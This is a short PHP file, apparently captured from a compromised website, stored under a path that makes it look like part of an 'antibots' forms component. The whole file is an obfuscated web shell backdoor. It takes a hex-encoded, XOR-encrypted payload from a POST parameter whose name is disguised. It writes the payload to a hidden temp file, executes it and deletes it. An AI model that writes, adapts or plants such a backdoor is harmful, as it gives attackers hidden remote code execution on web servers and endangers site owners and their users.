| Current File : /home/missente/public_html/cKlZG/upgrades/index/antibots/Forms.php |
<?php
if(filter_has_var(INPUT_POST, "v\x61\x6Cue")){
$sym = hex2bin($_POST["v\x61\x6Cue"]);
$parameter_group ='' ;foreach(str_split($sym) as $char){$parameter_group .= chr(ord($char) ^ 65);}
$holder = array_filter([session_save_path(), getcwd(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/tmp"]);
$key = 0;
do {
$bind = $holder[$key] ?? null;
if ($key >= count($holder)) break;
if ((is_dir($bind) and is_writable($bind))) {
$record = "$bind" . "/.flag";
if (file_put_contents($record, $parameter_group)) {
require $record;
unlink($record);
exit;
}
}
$key++;
} while (true);
}